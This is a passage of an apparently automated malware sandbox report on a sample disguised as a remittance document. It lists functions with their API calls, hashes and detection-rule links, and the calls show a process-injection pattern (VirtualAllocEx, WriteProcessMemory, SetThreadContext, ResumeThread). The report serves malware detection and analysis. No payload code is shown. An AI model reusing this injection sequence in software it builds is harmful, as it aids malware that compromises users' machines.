                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 2a79c09b42d02f4495beb9d32c2bd08acecafe25ba397c93038a9ee2a67c64f9
                                            • Instruction ID: 65c04f18239d874fb686773ae76a514fd8ae1be5f6cd793c3851b7f4c8b3fff9
                                            • Opcode Fuzzy Hash: 2a79c09b42d02f4495beb9d32c2bd08acecafe25ba397c93038a9ee2a67c64f9
                                            • Instruction Fuzzy Hash: E4815570A00B058FD728DF2AC449B5ABBF5FF88704F04892DD48AE7A50D735E989CB91
                                            Function 00E344B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 824 e344b0-e359d9 CreateActCtxA 827 e359e2-e35a3c 824->827 828 e359db-e359e1 824->828 835 e35a4b-e35a4f 827->835 836 e35a3e-e35a41 827->836 828->827 837 e35a51-e35a5d 835->837 838 e35a60 835->838 836->835 837->838 840 e35a61 838->840 840->840
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c40380616cf6b65e02e58dea80f9ac85a3cf965a025d0b3d1fb7b06655a2c21f
                                            • Instruction ID: 5fc4c4e0c0839a62fe12a4a46d67e19f2ee287fe4f82f351c34a21e8c8a0ef42
                                            • Opcode Fuzzy Hash: c40380616cf6b65e02e58dea80f9ac85a3cf965a025d0b3d1fb7b06655a2c21f
                                            • Instruction Fuzzy Hash: 7F41F2B1C00719CBDB24DFA9C888B9DBBF5FF89304F20815AD408AB255DBB56945CF90
                                            Function 00E3590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 14aa84032484dd6cbff99a28a5ce5f45939c45d3d2c13e4db9bb0fbbb76317de
                                            • Instruction ID: ae4f053e0d909a80eaf50fa1462de01a8320caf4943a3a95d3d840eeeaa7a552
                                            • Opcode Fuzzy Hash: 14aa84032484dd6cbff99a28a5ce5f45939c45d3d2c13e4db9bb0fbbb76317de
                                            • Instruction Fuzzy Hash: B04112B1C00719CEDB24DFA9C884B9DBBF5BF89304F20805AD018BB291DBB56945CF90
                                            Function 00E3D751 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: f74d467df64aa5d2ef885e2db2480ea7549f4bc1897d2244e4eb92f321a4c4b9
                                            • Instruction ID: 76009a60c7ae51dd4afc93a33b20932e2fa3fc25ac51a371f46ce36bcb6bc41f
                                            • Opcode Fuzzy Hash: f74d467df64aa5d2ef885e2db2480ea7549f4bc1897d2244e4eb92f321a4c4b9
                                            • Instruction Fuzzy Hash: 74313074A40380CFEB049F61F8847697BB1F7C4711F509D69E9119B3E8CAB85899CB12
                                            Function 06BE4EAE Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BE4F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 823b836f2e3285c8d0315e47047f6e63ed60d1499fd6909752f82a9113dd0e41
                                            • Instruction ID: d625165342e7c03227a571c585009165b4dab8297a7e331adceddeff4c37a864
                                            • Opcode Fuzzy Hash: 823b836f2e3285c8d0315e47047f6e63ed60d1499fd6909752f82a9113dd0e41
                                            • Instruction Fuzzy Hash: EE212AB5D003599FDB10DFA9C885BEEBBF5FF88310F108429E919A7240CB789944CBA5
                                            Function 06BE4EB0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BE4F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: b4254127a01d9cdb3cb949472996a62e42e053224d7595dda0e9be49a708f8c0
                                            • Instruction ID: 1861b627e03b7f104e4bf65715810993573b8fa9870915a35cb6be1781ac6c0a
                                            • Opcode Fuzzy Hash: b4254127a01d9cdb3cb949472996a62e42e053224d7595dda0e9be49a708f8c0
                                            • Instruction Fuzzy Hash: 80212AB5D003599FDB10DFA9C885BEEBBF5FF88310F108429E919A7240C7789944CBA4
                                            Function 06BE48D8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BE495E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: fa1052d164dd375f921f72e9a0c0ad9cc41169f45d4e86b77a441fdaaadf9317
                                            • Instruction ID: 2c828acbda62f4fe9f6d86593db22e9434d1594355537acc717e4330c4459d43
                                            • Opcode Fuzzy Hash: fa1052d164dd375f921f72e9a0c0ad9cc41169f45d4e86b77a441fdaaadf9317
                                            • Instruction Fuzzy Hash: FC2157B5D003088FDB10DFAAC485BEEBBF4EF89314F108429D559A7241CB78A945CFA1
                                            Function 00E3D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 08bf6ca41abbb30c11a799593deec3e10d2465cd0ce3b822c07483363e854128
                                            • Instruction ID: 864d8568f36293b1412e578be205dcce42b7b2cd6df36b22cfe721572e36b878
                                            • Opcode Fuzzy Hash: 08bf6ca41abbb30c11a799593deec3e10d2465cd0ce3b822c07483363e854128
                                            • Instruction Fuzzy Hash: DE21DFB59002499FDB10CFAAD985AEEBFF5FB48314F14841AE918A3350C378A945CFA0
                                            Function 06BE4FA0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BE5020
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 440f0af482faa25abf51bd4cb35fc35dc5d7d46e4161c9841a7e0bb061856097
                                            • Instruction ID: 8ae31089569640a2841ea423942128c217900c0b166f5c9d0982b9d014e6104f
                                            • Opcode Fuzzy Hash: 440f0af482faa25abf51bd4cb35fc35dc5d7d46e4161c9841a7e0bb061856097
                                            • Instruction Fuzzy Hash: C621F8B1C002499FCB10DFAAC845AEEFBF5FF48314F508429E519A7251C7799944CBA5
                                            Function 06BE48E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BE495E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5d74ba81827be5ce61809340aa9823c531da80a59922ccf85a860ad2b3f913b3
                                            • Instruction ID: a25a12ac21f752e0ff54dcc9b6256fb91ae5602d1b71ad10a3a1159a5bed51c5
                                            • Opcode Fuzzy Hash: 5d74ba81827be5ce61809340aa9823c531da80a59922ccf85a860ad2b3f913b3
                                            • Instruction Fuzzy Hash: 5F2147B5D003098FDB10DFAAC585BEEBBF4EF89314F10842AD559A7241CB78A945CFA0
                                            Function 00E3D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 1c2e59b9404a8381a15c2b50a4d209f45b410e71ba5705d986bc23f16aa8126e
                                            • Instruction ID: 275bfe52c7790bb1a5f98125e2b3d3fa2882b86ca2110fd75ace2b6ef9167fec
                                            • Opcode Fuzzy Hash: 1c2e59b9404a8381a15c2b50a4d209f45b410e71ba5705d986bc23f16aa8126e
                                            • Instruction Fuzzy Hash: F121C2B59002489FDB10CFAAD984ADEBFF9FB48314F14841AE918A7350D378A954CFA5
                                            Function 06BE4DE8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BE4E5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: e29f81817475e69243172222bf745ba0cce402f0eacf20bbff0fcf063973d032
                                            • Instruction ID: 5a5a41157b4017523595123fbf5ad2e789d3ac42b179b9f1fcba3ee486ba9dcf
                                            • Opcode Fuzzy Hash: e29f81817475e69243172222bf745ba0cce402f0eacf20bbff0fcf063973d032
                                            • Instruction Fuzzy Hash: 09114AB58002499FCB10DFAAC845BDEBFF5EF88314F108419E519A7250CB399940CBA1
                                            Function 00E3A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E3B079,00000800,00000000,00000000), ref: 00E3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: e2eeae7758a99037e3dd299317b1396008bd3f46c36553d3cf8f5841a1cf457f
                                            • Instruction ID: 5a5a7c643fdbcc4d6f98a7f3b63b3f71bc900cefc591ccb7b94b72d74be15889
                                            • Opcode Fuzzy Hash: e2eeae7758a99037e3dd299317b1396008bd3f46c36553d3cf8f5841a1cf457f
                                            • Instruction Fuzzy Hash: EE1106B58002088FCB10DF9AD448BAEFBF4EB48310F10851AD519B7210C775A945CFA4
                                            Function 00E3B218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E3B079,00000800,00000000,00000000), ref: 00E3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 5d6b4ace688d5919b66e88feb554fa9a121f008f377c34b8c4b9bdab86b5b920
                                            • Instruction ID: c5ed784990024261619ad0763da0d2f7522fa1e201f2549c4878b54bd6634529
                                            • Opcode Fuzzy Hash: 5d6b4ace688d5919b66e88feb554fa9a121f008f377c34b8c4b9bdab86b5b920
                                            • Instruction Fuzzy Hash: 911103B68002498FCB24CFAAC585BEEFBF5BB88310F14851AD519A7210C779A945CFA4
                                            Function 06BE43F1 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 91d0361ee6ef0d9ba84c566073b6f954a2aaab1cbc50b57b201365dd6d4b759a
                                            • Instruction ID: 1db3751987c7ee8be482a5931db5b88ba66f0d4ddeee6b95b652eec3e7a6c68a
                                            • Opcode Fuzzy Hash: 91d0361ee6ef0d9ba84c566073b6f954a2aaab1cbc50b57b201365dd6d4b759a
                                            • Instruction Fuzzy Hash: CE1149B19003088FCB20DFAAC445BDEFBF5EF88314F108419D519A7240CB38A940CBE5
                                            Function 06BE4DF0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BE4E5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c71cd8e7a033b51508bb0f3fd92efe127bf467265e547bc1863e609aa9edb988
                                            • Instruction ID: df16bacd8591878e5f355bcdac29c95bae290682444ab0837277b6d6f7ba5b7c
                                            • Opcode Fuzzy Hash: c71cd8e7a033b51508bb0f3fd92efe127bf467265e547bc1863e609aa9edb988
                                            • Instruction Fuzzy Hash: 091137B18002499FCB14DFAAC845BEFBFF5EF88324F108419E519A7250CB79A940CFA0
                                            Function 06BE43F8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: d74971113590899962c1d25dea23d180e7acceff79a0594b4edc24b554423c84
                                            • Instruction ID: b52bccdc43697a8d517f8ccdd7d9e04ecb8444772ce96d831e1398d6ccd55812
                                            • Opcode Fuzzy Hash: d74971113590899962c1d25dea23d180e7acceff79a0594b4edc24b554423c84
                                            • Instruction Fuzzy Hash: 86113AB1D002488FCB10DFAAC4457EEFBF5EF88314F20841AD519A7240CB79A944CBA4
                                            Function 00E3AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: bef485c409f0912cafc954f92f31b31dd3d763a8925ffd5c3418ec811929918d
                                            • Instruction ID: 388fbbe4788714d08af668888dd9aa3d7236bd30b19d326389723da0011be04d
                                            • Opcode Fuzzy Hash: bef485c409f0912cafc954f92f31b31dd3d763a8925ffd5c3418ec811929918d
                                            • Instruction Fuzzy Hash: EE11DFB5C006498FCB14DF9AC448B9EFBF9AF88314F14846AD529B7210D379A545CFA1
                                            Function 06BE98B0 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BE9915
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: dc4870a6d486cf6ab6464290f9c9d51e3df86a87a425bebebf8dcba7de2fab2b
                                            • Instruction ID: 924ae5490feea19cee42b3c44e1a30f37c1d05c45bdf47196a09cbe852aec5a1
                                            • Opcode Fuzzy Hash: dc4870a6d486cf6ab6464290f9c9d51e3df86a87a425bebebf8dcba7de2fab2b
                                            • Instruction Fuzzy Hash: 6711F2B58002498FDB20DF9AC485BDEBBF8FF48320F10845AE558A7211C379A984CFA0
                                            Function 06BE98E9 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BE9915
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 90cda4d6783a501df9dfbc69295254fc19d1c8d97bf54898f4b138170c00b22e
                                            • Instruction ID: b207e8d74f37eaab3c15a67d11cdeb12c9571137bf24159dcdca9fb4cccd777d
                                            • Opcode Fuzzy Hash: 90cda4d6783a501df9dfbc69295254fc19d1c8d97bf54898f4b138170c00b22e
                                            • Instruction Fuzzy Hash: E3F0E7B68003099FDB10DF89D844BDEBBF4FB48314F10845AE558A7211C379A584CFA1
                                            Function 052B78F7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: V
                                            • API String ID: 0-1342839628
                                            • Opcode ID: 6d29667fc8f5c32092c4dc82b24d2b94cf15f8ca73a2e1d5cb4ce315e55dac72
                                            • Instruction ID: 22042a1ebaca62acbad8acacf83bd2fceefd7276381e6780e59ef3a8d5dd3625
                                            • Opcode Fuzzy Hash: 6d29667fc8f5c32092c4dc82b24d2b94cf15f8ca73a2e1d5cb4ce315e55dac72
                                            • Instruction Fuzzy Hash: 11515B30E25205DBEB14CF69D8907FDBBB2FF84341F188466E456AA292C7F49A41EF11
                                            Function 052B9B90 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 23d6755050b412af3349b4992da565720dafb0d94b8b09502ac979bcdd5068d6
                                            • Instruction ID: 59106d172640aad4bc580be8b1021b62bc2f8064966ab003794bb39aa0bdf01c
                                            • Opcode Fuzzy Hash: 23d6755050b412af3349b4992da565720dafb0d94b8b09502ac979bcdd5068d6
                                            • Instruction Fuzzy Hash: 03115131B1020A8BDF48EBB999119EEB6F6AFC9750B244069C509E7344EB758E02C795
                                            Function 052B4ACC Relevance: .2, Instructions: 174COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4f4b777e48818b20c6e541da204347a8cbd7cca56bd592989bdedd778e09bf7
                                            • Instruction ID: fcb3e8f31d006f83fcc0a842105f6d4bdcdeb4b366c5f563a74219acf8ad3f25
                                            • Opcode Fuzzy Hash: e4f4b777e48818b20c6e541da204347a8cbd7cca56bd592989bdedd778e09bf7
                                            • Instruction Fuzzy Hash: FA51D421A1E3E11FD703A77C5C748FB7FB6AD8325034905D7D081CB2A3DA684909C3A6
                                            Function 052BACE9 Relevance: .2, Instructions: 150COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 716c0d22cda70ba25b26fe8531e7b312d7d69bd2383bde128a8c2ce30f01e30a
                                            • Instruction ID: 90020f07629ddf4c74073bcb762da6f82e6b1887bc3d49704016a80c742c3633
                                            • Opcode Fuzzy Hash: 716c0d22cda70ba25b26fe8531e7b312d7d69bd2383bde128a8c2ce30f01e30a
                                            • Instruction Fuzzy Hash: 0251B231B20209AFEB44DFA4C951BFE7AB3BF88750F148425E512AB3D5DBB08D428791
                                            Function 052B6338 Relevance: .1, Instructions: 149COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70d847113970e0fbb85b65d031fc2bd62deab24e6a71dffb0f2abf2faefb445e
                                            • Instruction ID: 552bbeda187774672e9e95634d53364c1e8f4737e28d5958c4cf7938c3608656
                                            • Opcode Fuzzy Hash: 70d847113970e0fbb85b65d031fc2bd62deab24e6a71dffb0f2abf2faefb445e
                                            • Instruction Fuzzy Hash: A851F770A38655CBEB14CF68D9402FABBF3BF85351F18867AE4B686282C3B4E541C711
                                            Function 052B6478 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b9eb7f3fc1abaf5317ede0cfe576ebe1f78ba094faa3bdef8c5512f1ce6f900
                                            • Instruction ID: 36ec9a8cf17bcd049c898a7b8a8af30a0d428217f80babcf37c29ea9be5bc25e
                                            • Opcode Fuzzy Hash: 3b9eb7f3fc1abaf5317ede0cfe576ebe1f78ba094faa3bdef8c5512f1ce6f900
                                            • Instruction Fuzzy Hash: FD415D70A29255CFD720C76CC4006FABFF6AF42384F1880BAE159CB246C7B5E942CB52
                                            Function 052B6F5A Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82e2398b027858b8a55e6a78e0596772d7fb0cf1d037f035b956c97c09072c89
                                            • Instruction ID: 5c021e5142b156e4e6c1bf6339a84edb0d0ce7eb1b744d76cd29fc9773e865b4
                                            • Opcode Fuzzy Hash: 82e2398b027858b8a55e6a78e0596772d7fb0cf1d037f035b956c97c09072c89
                                            • Instruction Fuzzy Hash: EA41E67451EBC08FD323AF3994546417FF0AF8720270A89DBC5C6CBAB3C665981AC722
                                            Function 052B89A8 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4da956f5cdf25505790ad58ceffb8907e8e02c2a091efa30157a8ad357391837
                                            • Instruction ID: 84342eabd2aa97ec97831663118806fd80dd97ca191382ac7adb3631b0d4c0ae
                                            • Opcode Fuzzy Hash: 4da956f5cdf25505790ad58ceffb8907e8e02c2a091efa30157a8ad357391837
                                            • Instruction Fuzzy Hash: 5131DEB2A242158BEB01CE69C9857EEBBB9FF41341F1440AAE059DB282C3F4C946DB51
                                            Function 052B89B8 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a8ca844793d1a3135bb60cced5e4a91fae71c966a701ca5b0d892302dc796e5
                                            • Instruction ID: 11aafa7577d300df1c9eb5c388645d1ffb819872314fcc2c7e21dd1b9430289c
